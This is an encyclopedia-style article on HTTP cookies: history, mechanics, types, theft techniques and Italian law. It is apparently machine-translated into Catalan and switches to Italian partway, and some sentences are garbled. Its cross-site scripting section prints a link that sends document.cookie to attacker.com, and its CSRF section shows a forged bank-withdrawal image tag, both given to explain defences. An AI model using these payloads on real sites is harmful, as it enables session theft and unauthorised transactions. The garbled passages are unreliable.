Cookies

Exemple de resposta HTTP de google.com que estableix una cookie amb atributs.

Les galetes HTTP ( pron. / ˈKuki / ; més precisament anomenades cookies web o cookies per excel·lència) ^[1] són un tipus particular de galetes màgiques (una mena de testimoni d’identificació) i són utilitzades per les aplicacions web del servidor per emmagatzemar i recuperar informació a llarg termini per part del client .

Història

El concepte i el terme galeta , que literalment significa "galeta", deriven de la galeta màgica ( galeta màgica ) una tècnica coneguda a l'entorn UNIX ja als anys vuitanta i que s'utilitza normalment per implementar mecanismes d'identificació d'un client en un servidor , com ara com a exemple l'autenticació del servidor del sistema X Window .

El primer ús de les cookies HTTP es remunta al 1994, quan es feien servir per comprovar si els lectors del lloc Netscape ja l’havien visitat abans. El 1995, la gestió de cookies es va integrar a Internet Explorer 2. La introducció de cookies no era coneguda inicialment per un gran públic, però es va iniciar després d’un article publicat al Financial Times el 12 de febrer de 1996 ^[2] . El debat que va seguir va tenir com a tema les implicacions de les cookies sobre el secret. Les cookies van ser objecte de dues audiències de la Comissió Federal de Comerç dels EUA el 1996 i el 1997. A partir d’aquestes dates es va començar a regular l’ús de cookies.

Avui les aplicacions més habituals es refereixen a l’emmagatzematge d’informació sobre els hàbits de l’usuari als llocs web que visita. Aquestes aplicacions sovint han generat dubtes per part dels defensors de la privadesa dels internautes, de fet, una cookie ens pot ajudar a navegar o espiar-nos. Aquest segon cas inclou moltes cadenes publicitàries (que venen publicitat a molts llocs diferents) que utilitzen una galeta adjunta a la imatge publicitària per correlacionar les visites del mateix usuari a diversos llocs diferents, creant així una mena de perfil dels llocs més diversos. apreciat. Altres usos que es consideren convenients perquè utilitzen la cookie com a servei per a l'usuari són, per exemple, l'enregistrament de les dades d'una sessió per evitar la necessitat d'una nova autenticació en una visita posterior (com ho fa Wikipedia per als seus usuaris registrats), o mantenir el contingut del "carret de la compra" als llocs de comerç electrònic .

Descripció

Generalitat

Els servidors envien galetes en resposta HTTP al client i s’espera que els navegadors web desin i enviïn galetes al servidor sempre que es facin sol·licituds addicionals al servidor web .

Aquest reconeixement permet la creació de mecanismes d’ autenticació utilitzats per exemple per als inicis de sessió ; emmagatzemar dades útils per a la sessió de navegació, com ara preferències en l’aspecte gràfic o lingüístic del lloc ; fer un seguiment de la navegació de l’usuari, per exemple amb finalitats estadístiques o publicitàries; per associar dades emmagatzemades pel servidor, per exemple, el contingut del carro de la compra d’una botiga electrònica .

Donades les implicacions per a la privadesa dels internautes, l’ús de cookies es classifica i regula en els sistemes legals de nombrosos països, inclosos els europeus, inclosa Itàlia. La seguretat d’una cookie d’ autenticació generalment depèn de la seguretat del lloc que l’emet, del navegador web de l’usuari i depèn de si la cookie està encriptada o no. Les vulnerabilitats de seguretat poden permetre als pirates informàtics llegir les dades de les galetes , que es podrien utilitzar per accedir a les dades de l’usuari, o per accedir (amb les credencials de l’usuari) al lloc web al qual pertany la galeta (consulteu scripts entre llocs i falsificació de sol·licituds entre llocs) per exemple). ^[3]

Galetes, i en particular les galetes de tercers, s'utilitzen comunament per recerques de navegació magatzem d'usuaris; aquestes dades sensibles poden ser una amenaça potencial per a la privadesa dels usuaris; precisament això va portar a les autoritats europees ^[4] i nord-americanes a regular el seu ús mitjançant una llei el 2011 ^[5] . De fet, la legislació europea exigeix que tots els llocs dels estats membres informin els usuaris que el lloc utilitza certs tipus de cookies .

Característiques

En termes pràctics i no especialitzats, una cookie és similar a un fitxer petit, emmagatzemat a l’ ordinador per llocs web mentre navega, útil per desar preferències i millorar el rendiment dels llocs web. Això optimitza l’experiència de navegació de l’usuari.

En detall, una cookie és una petita cadena de text enviada per un servidor web a un client web (generalment un navegador ) i després enviada pel client al servidor (sense ser modificada) cada vegada que el client accedeix a la mateixa porció. mateix domini web . Les galetes es van introduir originalment per proporcionar als usuaris una manera d’emmagatzemar els articles que volien comprar mentre navegaven pel lloc web (l’anomenat "carretó de la compra").

Avui, però, el contingut del carretó d’un usuari s’emmagatzema en una base de dades del servidor, en lloc de fer-ho en una cookie del client. Per fer un seguiment de quin usuari té assignat el carret de la compra, el servidor web envia una cookie al client que conté un identificador de sessió únic (normalment, una llarga sèrie de lletres i números). Com que s’envien cookies al servidor a petició de cada client, l’identificador de sessió s’enviarà al servidor cada vegada que l’usuari visiti una pàgina del lloc web, cosa que permet al servidor saber quin carretó ha de proporcionar a l’usuari.

Com que les cookies de sessió només contenen un identificador de sessió únic, la quantitat d'informació personal que un lloc web pot emmagatzemar és pràcticament il·limitada. El lloc no es limita a restriccions quant pot durar la cadena de text que compon una galeta. Les galetes de sessió també poden ajudar a millorar els temps de càrrega de la pàgina, ja que la quantitat d'informació d'una galeta de sessió és petita i requereix poc ample de banda.

La cookie principal, la que s’utilitza per emmagatzemar les opcions de totes les altres cookies, s’anomena cookie tècnica (consentiment) o la que presideix l’enviament i la recepció del paquet d’informació (marcadors).

Cada domini o part del mateix que es visita amb el navegador pot configurar cookies. Com que una pàgina d' Internet típica, com la d'un diari en xarxa, conté objectes que provenen de molts dominis diferents i que cadascun d'ells pot configurar cookies, és normal allotjar centenars de cookies al vostre navegador.

Sovint es considera erròniament que les cookies són programes reals i això genera creences errònies. En realitat, són simples blocs de dades, incapaços, per ells mateixos, de realitzar cap acció a l’ ordinador . En particular, no poden ser programes espia ni virus . Tot i això, les cookies d'alguns llocs es classifiquen com a programari espia per molts productes antispyware perquè permeten identificar l'usuari. Els navegadors moderns permeten als usuaris decidir si accepten o no les galetes, però qualsevol negativa fa que alguns objectes siguin inutilitzables. Per exemple, els carros de la compra implementats amb cookies no funcionen en cas de denegació.

Les cookies no només s’utilitzen en ordinadors o similars, sinó també en telèfons intel·ligents i tauletes .

Operació

Una cookie és una capçalera addicional present en una sol·licitud HTTP ( Cookie :) o resposta ( Set-cookie :) : si el servidor vol assignar una cookie a l’usuari, l’afegirà a les capçaleres de resposta. El client ha de notar la presència de la cookie i emmagatzemar-la en una àrea específica (en general, s’utilitza un directori on cada cookie s’emmagatzema en un fitxer ). La cookie consisteix en una cadena de text arbitrària, una data de caducitat (més enllà de la qual no s’ha de considerar vàlida) i un patró per reconèixer els dominis als quals s’ha de tornar a enviar. Es poden configurar diverses galetes en una única resposta HTTP.

El navegador web del client retornarà la galeta, sense cap modificació, adjuntant-la a totes les sol·licituds HTTP que compleixin el patró, dins de la data de caducitat. A continuació, el servidor pot optar per assignar la galeta de nou, sobreescrivint l’antiga. La reenviació de patrons permet que tots els subdominis d’un domini determinat rebin la galeta, si es desitja.

Les cookies s’utilitzen per afegir un estat a un protocol sense estat. Sense cookies no hi hauria diferència en una pàgina carregada abans d’ iniciar la sessió , des de la mateixa pàgina carregada després. Atès que les cookies romanen al sistema durant llargs períodes, els llocs poden assignar un índex a l'usuari i fer un seguiment de la seva navegació dins del lloc, normalment amb la finalitat de crear estadístiques. També es poden utilitzar per fer un seguiment de la navegació per llocs de tercers, en cas que aquests llocs de tercers utilitzin contingut del lloc que defineix la cookie. La publicitat en llocs normalment la gestionen empreses que tenen anuncis en diversos llocs web.

El contingut de la publicitat es carrega directament des del seu servidor (mitjançant una sol·licitud HTTP) i es mostra de manera integrada al lloc que l'usuari vol visitar. D’aquesta manera, el servidor de l’empresa publicitària rebrà l’adreça de la pàgina que es visualitza des del navegador de l’usuari i podrà enviar una cookie al client. Mitjançant aquest mecanisme, les empreses publicitàries poden agregar informació sobre usuaris i crear perfils i mostrar-los anuncis dirigits.

Ús

Com que es poden utilitzar per controlar la navegació per Internet , les cookies són objecte de debats sobre el dret a la privadesa . Molts països i organitzacions, inclosos els Estats Units i la Unió Europea , han legislat sobre això. També s’han criticat les cookies perquè no sempre poden identificar l’usuari amb precisió i també perquè poden estar subjectes a ciberatacs . Hi ha algunes alternatives a les cookies, però totes, juntament amb alguns avantatges, tenen contraindicacions.

A la política de cookies, els gestors d’un lloc web han d’especificar amb detall la política de cookies pròpies o de tercers.

Les activitats per a les quals s’utilitzen són l’ autenticació , el seguiment de sessions i l’emmagatzematge d’informació específica sobre els usuaris que accedeixen al servidor , com ara llocs web preferits o, en el cas de compres en línia, el contingut dels seus "carros de compra".

Fins i tot el motor de cerca més famós del món, Google , envia una cookie que emmagatzema dades sobre cerques, paraules clau de cerca i hàbits dels usuaris.

De manera més específica, els diferents usos de les cookies són, per tant, els següents:

Per omplir el carretó virtual de la compra a llocs comercials (les cookies ens permeten col·locar o eliminar articles del carretó en qualsevol moment).
Per permetre a un usuari iniciar sessió en un lloc web.
Per personalitzar la pàgina web en funció de les preferències de l'usuari (per exemple, el motor de cerca de Google permet a l'usuari decidir quants resultats de cerca vol mostrar per pàgina).
Per fer un seguiment dels camins de l'usuari (que solen utilitzar les empreses publicitàries per obtenir informació sobre el navegador, els seus gustos i preferències. Aquestes dades s'utilitzen per rastrejar el perfil d'un visitant per presentar només els bàners publicitaris que li puguin interessar).
Per a la gestió d’un lloc: les cookies són utilitzades pels responsables d’actualitzar un lloc per entendre com visiten els usuaris, quin camí segueixen dins del lloc. Si el camí condueix a carrerons a cegues, el gerent pot notar-ho i pot millorar la navegació del lloc.
Per compartir informació de la xarxa social amb altres usuaris.

Molts navegadors moderns permeten a l'usuari decidir quan accepta les cookies, però rebutjar algunes no permet l'ús d'alguns llocs (posem com a exemple el registre a un lloc web com la Viquipèdia).

La configuració es pot personalitzar per habilitar-les o bloquejar-les sempre, en un període determinat d’estada, per filtrar llocs basats en llistes blanques i llistes negres , i filtrar les cookies que fan servir el mateix servidor o també mitjançant enllaços (sovint publicitaris) a llocs allotjats en diferents servidors.

Cal tenir en compte que el funcionament de les cookies depèn totalment del navegador de navegació que utilitza l’usuari: en teoria, aquest programa pot donar a l’usuari el control complet de les cookies i permetre o denegar la seva creació i difusió.Microsoft Internet Explorer només té una gestió rudimentària de les cookies, mentre que alternatives com Opera o Mozilla Firefox donen a l’usuari un major control i li permeten acceptar / rebutjar cookies de llocs específics. Altres programes, que s’utilitzaran com a proxies , també permeten a l’usuari un major grau de control sobre el que passa.

Un servidor Tor o proxy té l’efecte final, no en eliminar l’adreça IP, sinó en fer-la aparèixer diferent de la del vostre ordinador. En el cas de la detecció de l'adreça IP, amb aquestes mesures, no hi ha limitacions en el nombre de llocs navegables.

Estructura

Elements

Contràriament al que es creu, una galeta no és un fitxer de text petit: es pot emmagatzemar en un fitxer de text, però no necessàriament. A la cookie normalment podem trobar quatre atributs:

Nom / valor és una variable i un camp obligatori.
La data de caducitat és un atribut opcional que permet establir la data de caducitat de la cookie. Es pot expressar com a data, com a nombre màxim de dies o com ara (implica que la cookie s’elimina immediatament de l’ordinador de l’usuari ja que caduca quan es crea) o Mai (mai) (implica que la cookie no caduquen i s’anomenen persistents).
El mode d’accés (HttpOnly) fa que la cookie sigui invisible per a JavaScript i altres idiomes del client a la pàgina.
Segura indica si la galeta s’ha d’enviar xifrada amb HTTPS .

Domini i camí

El domini (domini) i el camí (camí), defineixen l’àmbit de visibilitat de la galeta, indiquen al navegador que la galeta només es pot enviar al servidor per al domini i la ruta especificats. Si no s’especifica, prenen per defecte el valor del domini i el camí que els sol·licitava inicialment. Un exemple de directiva per a la creació de cookies per part d’un lloc web després de la sessió d’un usuari és el següent:

Set-Cookie: LSID=DQAAAK…Eaem_vYg; Domain=docs.foo.com; Path=/accounts; Expires=Wed, 13-Jan-20021 22:23:01 GMT; Secure; HttpOnly Set-Cookie: HSID=AYQEVn….DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-20021 22:23:01 GMT; HttpOnly Set-Cookie: SSID=Ap4P….GTEq; Domain=.foo.com; Path=/; Expires=Wed, 13-Jan-20021 22:23:01 GMT; Secure; HttpOnly ......

La primera cookie LSID té com a domini predeterminat docs.foo.com i path /accounts , que indicaran al navegador que utilitzi la cookie només quan la pàgina sol·licitada contingui docs.foo.com/accounts . Les altres 2 galetes HSID i SSID es poden enviar des del navegador al servidor quan es visiten, qualsevol dels subdominis de .foo.com amb qualsevol camí, per exemple www.foo.com/ . Les galetes només es poden configurar pels dominis principals i els seus subdominis.

Tipus de cookies

L’àmplia varietat de cookies al món de la web dificulta la seva classificació. No obstant això, és possible elaborar una taxonomia general separant-les en diferents categories. ^[6] El principal atribut pel qual podem dividir les cookies és el seu cicle de vida , que ens permet distingir-les en:

Cookies de sessió: aquestes cookies no s’emmagatzemen permanentment al dispositiu de l’usuari i s’esborren quan es tanca el navegador ^[7] . A diferència d'altres cookies, les cookies de sessió no tenen una data de caducitat i, en funció d'aquesta, el navegador pot identificar-les com a tals.
Cookies persistents: en lloc de desaparèixer quan es tanca el navegador, com és el cas de les cookies de sessió, les cookies persistents caduquen en una data concreta o després d’un determinat període de temps. Això significa que, durant tota la vida útil de la galeta (que pot ser llarga o curta en funció de la data de caducitat decidida pels seus creadors), la seva informació es transmetrà al servidor cada vegada que l’usuari visiti el lloc web, o sempre que l’usuari visualitzi un recurs pertanyent a aquest lloc des d'un altre lloc (per exemple, un anunci). Per aquest motiu, els anunciants poden utilitzar cookies persistents per registrar informació sobre els hàbits de navegació web d’un usuari durant un període de temps prolongat. Tanmateix, també s’utilitzen per motius “legítims” (com ara mantenir els usuaris registrats al seu compte a llocs web, per tal d’evitar introduir credencials per accedir a llocs web en cada visita).

Aleshores és possible classificar les cookies segons el seu origen en:

Cookies pròpies: normalment, l'atribut de domini d'una cookie es correspondrà amb el domini que es mostra a la barra d'adreces del navegador web; són cookies enviades al navegador directament des del lloc que visiteu. Això s’anomena cookie pròpia . Poden ser persistents i de sessió; són gestionats directament pel propietari i / o gestor del lloc i s’utilitzen, per exemple, per garantir el seu funcionament tècnic o fer un seguiment de les preferències expressades quant a l’ús del lloc.
Les galetes de tercers: les galetes de tercers pertanyen a dominis diferents de què es mostra a la barra d'adreces. Aquest tipus de cookies solen aparèixer quan les pàgines web presenten contingut, com ara anuncis de bàner, de llocs web externs. Això implica la possibilitat de controlar l'historial de navegació de l'usuari, i sovint és utilitzat pels anunciants, en un intent de publicar anuncis rellevants i personalitzats per a cada usuari. Per exemple, suposem que un usuari visita www.example.org . Aquest lloc web conté un anunci de ad.foxytracking.com , que, un cop descarregat, estableix una cookie pertanyent al domini publicitari ( ad.foxytracking.com ). A continuació, l'usuari visita un altre lloc web, www.foo.com , que també conté un anunci de ad.foxytracking.com/ , i que també estableix una cookie pertanyent a aquest domini ( ad.foxytracking.com ). Finalment, aquestes dues cookies s’enviaran al venedor quan pengi els seus anuncis o visiti el seu lloc web. A continuació, l’anunciant pot utilitzar aquestes cookies per crear un historial de navegació d’usuaris a tots els llocs que tinguin anuncis d’aquest anunciant. La majoria dels navegadors web moderns contenen configuracions de privadesa que poden bloquejar les cookies de tercers.

Finalment, és possible distingir-los del punt de vista d’ ús (o finalitat ) en:

Cookies tècniques: s’utilitzen per a la navegació (ja que són funcionalment necessàries per desplaçar-se per la pàgina, consultar el contingut, proporcionar el servei) i facilitar l’accés i l’ús del lloc per part de l’usuari. Les cookies tècniques són essencials, per exemple, per accedir a Google o Facebook sense haver d’iniciar sessió a totes les sessions. També ho són en operacions molt delicades com ara la banca a domicili o el pagament amb targeta de crèdit o mitjançant altres sistemes.
Cookies estadístiques: s’utilitzen amb la finalitat d’optimitzar el lloc, directament pel propietari del lloc, que pot recopilar informació de forma agregada sobre el nombre d’usuaris i com visiten el lloc. En aquestes condicions, les mateixes regles s’apliquen a les cookies estadístiques, en termes d’informació i consentiment, previstes per a les cookies tècniques.
Cookies per emmagatzemar preferències: (també anomenades cookies funcionals ) són cookies útils per afavorir l’ús eficaç del lloc per part de l’usuari i, per tant, afavorir l’experiència de navegació personalitzada. S'utilitzen, per exemple, per fer un seguiment de l'idioma escollit.
Cookies de màrqueting i perfilat (publicitat): aquestes cookies estan destinades a proporcionar espais publicitaris. Poden ser instal·lats pel propietari del lloc o per tercers. Alguns s’utilitzen per reconèixer anuncis individuals i saber quins van ser seleccionats i quan. Altres cookies publicitàries s’utilitzen per hipotetitzar el “perfil” de navegació d’un usuari, per tal de poder proposar missatges publicitaris d’acord amb el seu comportament i interessos a la xarxa. Aquest "perfil" és anònim i la informació recollida a través d'aquestes cookies no permet rastrejar la identitat de l'usuari. En aquest cas, la cookie presideix un dels sistemes per pilotar l'anomenada "publicitat comportamental" ^[8] .
Cookies de xarxes socials: són cookies que permeten compartir el contingut del lloc que visiteu amb altres usuaris. Aquestes cookies s'utilitzen normalment per activar les funcions "M'agrada" o "Segueix" de xarxes socials com Facebook i Twitter, per citar només algunes. Aquestes funcions permeten a les xarxes socials identificar els seus usuaris i recopilar informació fins i tot mentre naveguen per altres llocs.

Altres tipus útils de cookies:

Cookie segura: una cookie amb el senyalador Secure només es pot transmetre mitjançant una connexió xifrada (és a dir, HTTPS ). D’aquesta manera es redueix la probabilitat d’exposar-se al robatori de galetes mitjançant les escoltes telefòniques. Per aconseguir-ho, els navegadors que admeten aquest senyalador només enviaran cookies amb el senyalador Secure quan es sol·liciti una pàgina HTTPS. En altres paraules, el navegador no enviarà cap galeta amb el senyalador Secure en una sol·licitud HTTP, és a dir, en una connexió sense xifrar.
Cookie HttpOnly: les cookies amb el senyalador HttpOnly només es poden utilitzar si es transmeten mitjançant HTTP (o HTTPS ). No són accessibles mitjançant API que no siguin HTTP com JavaScript. Aquesta restricció elimina l'amenaça de robatori de galetes mitjançant scripts entre llocs (XSS), evitant les amenaces de rastreig entre llocs (XST) i falsificació de sol·licituds entre llocs (CSRF) .
Cookie SameSite: Google Chrome 51 va introduir ^[9] una nova marca SameSite que permet enviar la cookie només per a sol·licituds de la mateixa font, aconseguint així neutralitzar atacs com CSRF i altres tipus d’atacs.
SuperCookie: la "supercookie" és una cookie amb un origen de domini de primer nivell (per exemple .com ) o amb un sufix públic (per exemple .co.uk ). Les cookies normals, en canvi, s’originen en un domini determinat, per exemple example.com . Les supercookies poden ser un problema de seguretat potencial i, per tant, sovint són bloquejades pels navegadors web. Si es desbloqueja des de l’ordinador client, un atacant, mitjançant un lloc web maliciós, podria configurar una supercookie i potencialment destruir o redirigir les peticions dels usuaris legítims a un altre lloc web que comparteixi el mateix domini de nivell superior o sufix públic que el lloc web. Per exemple, una supercookie amb un domini .com pot influir maliciosament en una sol·licitud avançada a example.com , fins i tot si la galeta no es va originar a example.com . Es pot utilitzar per falsificar l'inici de sessió o modificar la informació de l'usuari. La llista de sufixos públics ^[10] ajuda a reduir el risc que es pot crear a través de les supercookies. Aquesta llista és una iniciativa transversal que té com a objectiu proporcionar una llista precisa i actualitzada de noms de domini. Les versions anteriors dels navegadors no poden tenir una llista actualitzada i, per tant, seran vulnerables a les supercookies de determinats dominis.
Cookies de zombis: les galetes de zombis són galetes que es recreen automàticament després de ser eliminades. Això s’aconsegueix emmagatzemant el contingut de les galetes en diverses ubicacions, com ara emmagatzematge local flash, emmagatzematge HTML5 i a través d’altres mecanismes d’arxiu, tant pel client com pel servidor. Quan es detecta l’absència de cookies, es recrea mitjançant les dades emmagatzemades en aquestes ubicacions. La biblioteca Evercookie dóna un exemple de galeta zombi.

Manipulacions sobre cookies

Un procediment de manipulació de galetes és la intoxicació per galetes . Consisteix a modificar el contingut d’una cookie (per exemple, la informació personal desada a l’ordinador de l’usuari) per tal d’eludir els mecanismes de seguretat . Mitjançant aquesta tècnica, els atacants poden obtenir informació privada i no autoritzada d'un usuari, així com robar la seva identitat digital . Les cookies emmagatzemades a l’ordinador de l’usuari contenen informació que permet a les aplicacions autenticar l’ID d’usuari, controlar el comportament de l’usuari i personalitzar el contingut d’un lloc. En general, aquestes dades estan sotmeses a xifratge , però els algoritmes no sempre són segurs, de manera que alguns usuaris amb intencions malicioses poden robar les nostres dades i utilitzar-les o modificar-les. Segons l'organització The Open Web Application Security Project, conegut habitualment com OWASP , la manipulació de cookies és un dels 20 atacs més utilitzats pels pirates informàtics, especialment en sistemes de comerç electrònic , i s'utilitza per identificar l'usuari.

La majoria de llocs web utilitzen cookies com a identificadors únics per a les sessions d’usuari, ja que altres mètodes d’identificació tenen limitacions i vulnerabilitats. Tanmateix, hi ha un risc, de fet, que pugui permetre als atacants robar i suplantar les sol·licituds dels usuaris. Des del punt de vista del servidor web, una sol·licitud feta per un usuari amb intenció malintencionada (és a dir, un usuari que ha robat les cookies d’altres usuaris) no té cap diferència respecte a la sol·licitud feta per la víctima.

A continuació s’enumeren diverses tècniques de robatori de galetes que només funcionen amb llocs web que depenen de galetes HTTP per autenticar els usuaris.

Intercepcions de xarxa

Es pot robar una galeta d’un altre equip interceptant-la des de la xarxa.

El trànsit d’una xarxa pot ser interceptat i llegit per un ordinador connectat a una xarxa diferent de la de l’emissor i el destinatari (en particular quan es connecta a una xarxa Wi-Fi sense xifrar). Aquest trànsit inclou galetes enviades a través de sessions HTTP no xifrades i pot permetre que els atacants llegeixin comunicacions d'altres usuaris de la xarxa, incloses les galetes HTTP , així com tot el contingut de les converses, amb la finalitat de fer un atac a l' home .

Un atacant podria fer servir galetes interceptades per suplantar l’usuari propietari de les galetes i dur a terme operacions malicioses, com ara transferir sumes de diners del compte bancari de la víctima a altres comptes, sovint irremeiables.

Aquest problema es pot resoldre mitjançant una comunicació xifrada, entre l’ordinador de l’usuari i el servidor web, mitjançant Transport Layer Security (protocol HTTPS ). El servidor pot especificar el senyalador segur quan estableix galetes, de manera que el navegador només pot enviar galetes per un canal xifrat, com ara una connexió SSL .

Subdominis falsos i intoxicació a la memòria cau de DNS

Si un atacant és capaç d’amagar un servidor DNS i fer que l’usuari faci servir un servidor DNS fals ( intoxicació de memòria cau de DNS ), això podria permetre a l’atacant accedir a les cookies de l’usuari. Per exemple, un atacant podria utilitzar una intoxicació a la memòria cau de DNS per crear un fals DNS de f12345.www.example.com que realment apunti a l' adreça IP del servidor de l' atacant . Aquests últims poden introduir la imatge URL del seu servidor (per exemple, http://f12345.www.example.com/img_4_cookie.jpg) . Les víctimes que llegeixin el missatge de l'atacant baixaran aquesta imatge de f12345.www.example.com . Com que f12345.www.example.com és un subdomini de www.example.com , el navegador de la víctima enviarà totes les cookies de example.com al servidor de l'atacant.

Se un utente malintenzionato è in grado di raggiungere questo obiettivo, di solito la colpa è dei fornitori dei servizi Internet ( Internet Service Providers ) che non hanno garantito una connessione sicura dei server DNS. Tuttavia, la gravità di questo attacco può essere ridotta se il sito destinatario utilizza i cookie protetti. In questo caso, l'utente malintenzionato avrà un ulteriore ostacolo, quello di ottenere il certificato SSL del sito Web di destinazione da un' autorità di certificazione , dal momento che i cookie sicuri possono essere trasmessi solo tramite una connessione criptata. Senza un certificato SSL, i browser delle vittime avrebbero visualizzato un messaggio di avviso relativo al certificato non valido del sito web dell'attaccante, che potrebbe aiutare gli utenti a non visitarlo, evitando così di inviare i cookie ad un sito non sicuro.

Cross-site scripting: furto dei cookie

Lo stesso argomento in dettaglio: Cross-site scripting .

I cookie possono anche essere rubati utilizzando una tecnica chiamata cross-site scripting . Ciò si verifica quando un attaccante sfrutta un sito web che permette agli utenti di inviare contenuto non filtrato HTML e JavaScript. Inviando dei contenuti malevoli HTML e JavaScript, l'attaccante può servirsi del browser della vittima per prendere il controllo dei suoi cookie.

A titolo di esempio, un utente malintenzionato può inviare un messaggio sul www.example.com con il seguente link:

 < a href = "#" onclick = "window.location='http://attacker.com/stole.cgi?text='+escape(document.cookie); return false;" > Click here! </ a >

cross-site scripting: un cookie che dovrebbe essere scambiato solo tra server e client viene invece inviato all'attaccante.

Quando un altro utente clicca su questo link, il browser esegue un pezzo di codice all'interno dell'attributo onclick , sostituendo così la stringa document.cookie con la lista dei cookie che sono accessibili dalla pagina corrente. Come risultato, questo elenco di cookie viene inviato al server attacker.com . Se la connessione avviene mediante HTTPS https://www.example.com , i Secure cookie saranno inviati lo stesso ad attacker.com in formato testo.

È responsabilità degli sviluppatori dei siti web filtrare tale codice dannoso.

Tali attacchi possono essere ridotti utilizzando i cookie HttpOnly . Questi cookie non saranno accessibili dal lato client attraverso linguaggi di scripting come JavaScript e, quindi, l'attaccante non sarà in grado di rubare questi cookie.

Cross-site scripting: richiesta proxy

Nelle versioni più vecchie di molti browser, ci furono buchi di sicurezza che permisero agli attaccanti di sporcare gli script di una richiesta proxy, dal lato client, tramite XMLHttpRequest API. Ad esempio, la vittima sta leggendo un post di un attaccante su www.example.com , e lo script dell'attaccante viene eseguito nel browser della vittima. Lo script genera una richiesta per www.example.com con attacker.com come server proxy. Dal momento che la richiesta è per www.example.com , tutti i cookie di example.com verranno inviati insieme alla richiesta, tuttavia verranno instradati attraverso il server proxy dell'attaccante. Quindi, l'attaccante sarebbe in grado di intercettare i cookie della vittima.

Questo attacco non avrebbe funzionato con i Secure cookie, in quanto possono essere trasmessi solo su connessioni HTTPS , e il protocollo HTTPS implementa una crittografia end-to-end (vale a dire che le informazioni sono crittografate sul browser dell'utente e decifrate sul server di destinazione). In questo caso, il server proxy avrebbe visto solo i primi byte cifrati della richiesta HTTP.

Cross-site request forgery

Lo stesso argomento in dettaglio: Cross-site request forgery .

Ad esempio, Bob potrebbe navigare in un forum in cui un altro utente, Mallory, ha postato un messaggio. Supponiamo che Mallory abbia realizzato un'immagine HTML che fa riferimento ad un'operazione sul sito web della banca di Bob, (piuttosto che un file immagine) ad esempio:

 <img src= "http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory" >

Se la banca di Bob mantiene le sue informazioni di autenticazione in un cookie, e se il cookie non è scaduto, allora il tentativo da parte del browser di Bob di caricare l'immagine presenterà il modulo di rinuncia del suo cookie, autorizzando in tal modo una transazione senza l'approvazione di Bob.

Eliminazione

Una volta che si è impostato il browser perché accetti i cookie, essi sono archiviati in una speciale cartella del sistema, solitamente nel percorso dell'utente. Il percorso ove materialmente sono memorizzati i file corrispondenti dipende dalla combinazione tipologia dispositivo/sistema operativo/browser ^[11] . Si possono facilmente cancellare sia agendo sui comandi previsti dal browser (i medesimi che permettono di cancellare la cronologia, la cache , le informazioni di login , i dati di compilazione dei moduli, ecc.) oppure utilizzando uno dei tanti "pulitori" di terze parti, quali ad esempio CCleaner , Spybot- Search & Destroy . Oltre alla eliminazione massiva si può ricorrere a quella dei singoli file ma allora occorre riconoscerli agendo (nella cartella relativa) sugli specifici cookie di interesse.

Una volta eseguita l'eliminazione dei cookie, è normale che il browser ei vari siti web si ripresentino con delle richieste, rispettivamente, di personalizzazione impostazione e di accettazione cookie oppure la navigazione su siti abituali sia leggermente e inizialmente un poco più lenta: questo è dovuto, appunto, alla pulizia eseguita.

Aspetti giuridici

Legislazione italiana

In Italia la norma di riferimento relativamente ai cookie è l'art. 122 ^[12] del codice della privacy che nella sua formulazione a fine maggio 2012 recepisce la direttiva comunitaria 2009/136/CE ^[13] E-Privacy. È quindi necessario che l'utente, salvo casi particolari, sia informato e presti esplicitamente il consenso, prima che i cookie vengano salvati. Tale indicazione, pur se tesa a dare maggiori garanzie agli utenti, creò a suo tempo allerta negli operatori per il rischio che potesse compromettere le modalità di navigazione come le conosciamo oggi ^[14] .

Il 2 giugno 2015 divenne obbligatorio per i gestori di siti web adeguarsi al Provvedimento “Individuazione delle modalità semplificate per l'informativa e l'acquisizione del consenso per l'uso dei cookie” (Gazzetta Ufficiale n. 126 del 3 giugno 2014) dell'8 maggio 2014 ^[15] , con cui il Garante per la Protezione dei Dati Personali detta le regole sulle modalità di adempimento agli obblighi di rilascio dell'informativa e di acquisizione del consenso degli utenti in caso di utilizzo di cookie. Per tutti i siti web che utilizzano Cookie non tecnici (di profilazione) il Provvedimento stabilisce che nel momento in cui si accede ad una qualsiasi pagina del sito web deve immediatamente comparire in primo piano un banner ^[16] (contenente l'informativa breve) di idonee dimensioni, con caratteristiche tali da determinare una discontinuità dell'esperienza di navigazione, indicante:

a) L'utilizzo di Cookie di profilazione al fine di inviare messaggi pubblicitari in linea con le preferenze manifestate dall'utente nell'ambito della navigazione in rete;

b) se il sito consente l'invio di Cookie "terze parti";

c) il link all'informativa estesa;

d) la possibilità di negare il consenso all'installazione di qualunque cookie;

e) che la prosecuzione della navigazione comporta la prestazione del consenso all'uso dei cookie.

Al banner di informativa breve deve essere poi collegato un Cookie tecnico che permetta di tenere traccia del consenso dell'utente per le successive navigazioni sul medesimo sito internet.

Attraverso il banner di informativa, e attraverso i riferimenti in calce ad ogni pagina del sito, l'utente deve quindi poter accedere all'informativa estesa (la cosiddetta cookie policy ) che deve contenere tutti gli elementi previsti dall'art. 13 del Codice ^[17] , descrivere in maniera specifica e analitica le caratteristiche le finalità dei Cookie installati dal sito, consentire all'utente di selezionare o deselezionare i singoli cookie, contenere i link aggiornati alle informative e ai moduli di consenso delle terze parti con le quali l'editore ha stipulato accordi per l'installazione di Cookie tramite il proprio sito. Qualora l'editore abbia contatti indiretti con le terze parti, dovrà inserire i link dei siti che fanno da intermediari tra lui e le stesse terze parti.

L'informativa deve infine richiamare la possibilità per l'utente di manifestare le proprie opzioni in merito all'uso dei Cookie da parte del sito anche attraverso le impostazioni del browser, indicando almeno la procedura da eseguire per configurare tali impostazioni.

In caso di omessa o inidonea informativa, oltre che nelle previsioni di cui all'art. 13 del Codice, nel provvedimento è prevista la sanzione amministrativa del pagamento di una somma da seimila a trentaseimila euro (art. 161 del Codice).

L'installazione di Cookie sui terminali degli utenti in assenza del preventivo consenso degli stessi comporta, invece, la sanzione del pagamento di una somma da diecimila a centoventimila euro (art. 162, comma 2-bis, del Codice) ^[18]

L'omessa o incompleta notifica al Garante da parte di soggetti che utilizzano Cookie di 'profilazione' comporta una sanzione da venti mila a centoventi mila euro (art. 163 del Codice). Esclusi da tale obbligo sono coloro che non utilizzano direttamente i cookie di 'profilazione':

-siti che trasmettono cookie di 'profilazione' di "terze parti";

-siti che utilizzano direttamente cookie tecnici.

Il garante ha altresì fornito in merito ai casi in cui sia necessaria la notifica ulteriori chiarimenti nel documento web n. 993385 .

